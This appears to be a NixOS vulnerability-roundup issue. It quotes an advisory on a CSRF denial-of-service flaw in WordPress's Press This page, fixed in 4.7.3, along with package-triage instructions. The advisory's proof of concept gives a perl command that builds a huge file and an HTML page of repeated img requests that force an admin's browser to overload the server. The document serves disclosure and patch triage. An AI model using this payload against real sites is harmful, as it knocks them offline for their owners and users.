Identify if we have the software, in 16.09, 17.03, and unstable. Then determine if we are vulnerable, and make a comment with your findings. It can also be helpful to specify if you think there is a patch, or if it can be fixed via a general update.
Example:
unstable: we are not vulnerable (link to the package)
17.03: we are vulnerable (link to the package)
16.09: we don't have it packaged
IMPORTANT: If you believe there are possibly related issues, bring them up on the parent issue!
Patching
Start by commenting on this issue saying you're working on a patch. This way, we don't duplicate work.
If you open a pull request, tag this issue and the master issue for the roundup.
If you commit the patch directly to a branch, please leave a comment on this issue with the branch and the commit hash, example:
Tue, 7 Mar 2017 00:02:13 +0100 Summer of Pwnage , 2de68dc9-33ed-3cfc-a621-f958625a2a6b@securify.nl
------------------------------------------------------------------------
Cross-Site Request Forgery in WordPress Press This function allows DoS
------------------------------------------------------------------------
Sipke Mellema, July 2016
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery (CSRF) vulnerability exists on the Press
This page of WordPress. This issue can be used to create a Denial of
Service (DoS) condition if an authenticated administrator visits a
malicious URL.
------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160718-0005
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WordPress [2] version 4.5.3.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in WordPress version 4.7.3. [3]
------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
WordPress is web software you can use to create a website, blog, or
app. A Cross-Site Request Forgery (CSRF) vulnerability exists on the
Press This page of WordPress. This issue can be used to create a Denial
of Service (DoS) condition of an affected WordPress site.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
WordPress' Press This [4] function allows quick publishing with a
special web browser bookmarklet. An admin can also visit the Press This
page directly. One of the features of Press This is scanning an external
server for embeddable content. This is done with a GET request to:
/wp-admin/press-this.php?u=<URL>&url-scan-submit=Scan
When this URL is called, Press This will download the page located at
"URL" and look for content such as images and other embeddable elements.
No maximum is set for the amount of data Press This can retrieve when
scanning. This behavior can be abused by setting the external URL to a
huge file and have an authenticated admin visit it. The PHP process will
use 100% of its CPU resources to process the file. If an authenticated
admin can be lured to an external page, then the malicious URL can be
called many times, blocking all PHP server threads. This will cause the
server to be unreachable for a while.
------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
On an external server, create a large text file with the command:
perl -e 'print "<>"x28000000' > foo.txt
Next, create a file called dos.html on the external server with enough
entries to fill the connection pool of the WordPress server, as follows:
<img src='http://<wp
server>/wp-admin/press-this.php?u=http%3A%2F%2F<external
server>%2Ffoo.txt&url-scan-submit=Scan&a=b'>
<img src='http://<wp
server>/wp-admin/press-this.php?u=http%3A%2F%2F<external
server>%2Ffoo.txt&url-scan-submit=Scan&a=c'>
<img src='http://<wp
server>/wp-admin/press-this.php?u=http%3A%2F%2F<external
server>%2Ffoo.txt&url-scan-submit=Scan&a=d'>
<img src='http://<wp
server>/wp-admin/press-this.php?u=http%3A%2F%2F<external
server>%2Ffoo.txt&url-scan-submit=Scan&a=e'>
<img src='http://<wp
server>/wp-admin/press-this.php?u=http%3A%2F%2F<external
server>%2Ffoo.txt&url-scan-submit=Scan&a=f'>
<img src='http://<wp
server>/wp-admin/press-this.php?u=http%3A%2F%2F<external
server>%2Ffoo.txt&url-scan-submit=Scan&a=g'>
[..]
(replace <wp server> with the WordPress server address and <external
server> with the external server)
Now have a logged in admin visit dos.html. The server will be down for a
while.
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
[2] https://wordpress.org/
[3]
https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
[5] https://codex.wordpress.org/Press_This
grahamc
commented
7 years ago
Here is a report from the oss-security mailing list for Vulnerability Roundup 27.
Skip to First Email
Instructions:
Identification
Identify if we have the software, in 16.09, 17.03, and unstable. Then determine if we are vulnerable, and make a comment with your findings. It can also be helpful to specify if you think there is a patch, or if it can be fixed via a general update.
Example:
IMPORTANT: If you believe there are possibly related issues, bring them up on the parent issue!
Patching
Start by commenting on this issue saying you're working on a patch. This way, we don't duplicate work.
If you open a pull request, tag this issue and the master issue for the roundup.
If you commit the patch directly to a branch, please leave a comment on this issue with the branch and the commit hash, example:
Skip to First Email
Upon Completion ...
Info
Triage Indicator:
Should the search term be changed from
wordpress? Suggest a new package search by commenting:Known CVEs:
Skip to End
Tue, 7 Mar 2017 00:02:13 +0100 Summer of Pwnage,
2de68dc9-33ed-3cfc-a621-f958625a2a6b@securify.nlSkip to End